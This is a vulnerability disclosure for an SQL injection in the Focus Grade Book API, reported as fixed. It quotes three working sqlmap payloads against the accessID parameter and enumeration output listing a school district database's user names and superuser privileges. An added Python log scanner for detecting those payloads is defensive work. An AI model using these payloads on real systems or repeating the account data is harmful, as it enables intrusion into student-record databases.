🔓 First Focus Paper by John Bell 🔓
In early December 2019 I identified the following SQLi vulnerability in the Focus Grade Book.
The vulnerable API endpoint is located at /focus/legacy_API/APIEndpoint.php
** Reported at Dec 6, 2019, 5:00 PM **
** Fixed at Dec 6, 2019, 5:18 PM **
*************************
***** John Bell ***
**** Focus Paper ****
*** DECEMBER 2019 *****
*************************
Exploited GET Parameter: accessID
(1)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: api&method&signature&accessID=1 AND 4257=(SELECT (CASE WHEN (4257=4257) THEN 4257 ELSE (SELECT 3158 UNION SELECT 8852) END))-- QPJB
Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT]
(2)
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: api&method&signature&accessID=1 AND 9449=CAST((CHR(113)||CHR(113)||CHR(106)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (9449=9449) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC)
Vector: AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)
(3)
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: api&method&signature&accessID=1 AND 8985=(SELECT 8985 FROM PG_SLEEP(5))
Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
back-end DBMS: PostgreSQL
back-end DBMS Version: 'PostgreSQL 10.3 on x86_64-pc-linux-gnu, compiled by gcc (GCC) 4.4.7 20120313 (Red Hat 4.4.7-18), 64-bit'
back-end operating system: Linux Red Hat
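The three sqlmap vectors above (boolean-based blind, PostgreSQL error-based CAST, and PG_SLEEP time-based) are distinctive enough to detect in web server logs. The following is an added example, not part of the original report: a small Python scanner that decodes the accessID parameter of requests to the endpoint, matches it against signatures derived from those vectors, and additionally flags any non-integer accessID, since a legitimate value is a plain number. The log lines are constructed for the example (the IP, timestamp and status are made up); the payloads are the ones quoted in the report.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Signatures derived from the three sqlmap vectors in the report: boolean-based
# blind, PostgreSQL error-based (CAST ... AS NUMERIC) and time-based (PG_SLEEP).
SIGNATURES = {
    "boolean-blind": re.compile(r"\band\s+\d+\s*=\s*\(\s*select\s+\(\s*case\s+when\b", re.I),
    "error-based": re.compile(r"\bcast\s*\(.*\bas\s+numeric\s*\)", re.I | re.S),
    "time-blind": re.compile(r"\bpg_sleep\s*\(", re.I),
}
ACCESS_ID_OK = re.compile(r"^\d+$")       # accessID is a plain integer in legitimate traffic
REQ_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
ENDPOINT = "/focus/legacy_API/APIEndpoint.php"

def classify_access_id(value):
    """Tags for one decoded accessID value; an empty list means it looks benign."""
    tags = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    if not ACCESS_ID_OK.match(value.strip()):
        tags.append("non-numeric-accessID")  # vector-independent: also catches variants
    return tags

def scan_log(lines):
    """Return (line_no, tags) for every request to ENDPOINT whose accessID is flagged."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ_LINE.search(line)
        if not m or urlsplit(m.group(1)).path != ENDPOINT:
            continue
        params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)  # %xx decoded
        for value in params.get("accessID", []):
            tags = classify_access_id(value)
            if tags:
                hits.append((n, tags))
    return hits

# The report's three payloads plus one benign value, used as constructed test traffic.
PAYLOADS = [
    "1",
    "1 AND 4257=(SELECT (CASE WHEN (4257=4257) THEN 4257 ELSE (SELECT 3158 UNION SELECT 8852) END))-- QPJB",
    "1 AND 9449=CAST((CHR(113)||CHR(113)||CHR(106)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (9449=9449) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC)",
    "1 AND 8985=(SELECT 8985 FROM PG_SLEEP(5))",
]

def build_sample_log():
    """Constructed Apache-style access-log lines (not real traffic) carrying PAYLOADS."""
    fmt = '10.0.0.5 - - [06/Dec/2019:17:00:00 -0500] "GET {}?api&method&signature&accessID={} HTTP/1.1" 200 512'
    return [fmt.format(ENDPOINT, quote(p, safe="")) for p in PAYLOADS]

if __name__ == "__main__":
    for line_no, tags in scan_log(build_sample_log()):
        print(line_no, tags)
```

Lines 2 to 4 of the constructed log are flagged (one vector each, plus the non-numeric check); the benign accessID=1 request on line 1 is not.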
Exploited User: 'polk_focus'
Database Users:
[*] polk_ro
[*] polk_rw
[*] postgres
[*] tsteorts
[*] tvanpool
[*] wbusr_ro
[*] automato_user
[*] penny_cook_ro
[*] fiat_user
[*] evolve_user
[*] polk_focus
Database User Password Hashes:
Database User Privileges:
[*] automato_user [0]:
[*] evolve_user [0]:
[*] fiat_user [0]:
[*] penny_cook_ro [0]:
[*] polk_focus (administrator) [1]:
privilege: super
[*] polk_ro [0]:
[*] polk_rw [0]:
[*] postgres (administrator) [2]:
privilege: createdb
privilege: super
[*] tsteorts (administrator) [1]:
privilege: super
[*] tvanpool (administrator) [1]:
privilege: super
[*] wbusr_ro [0]: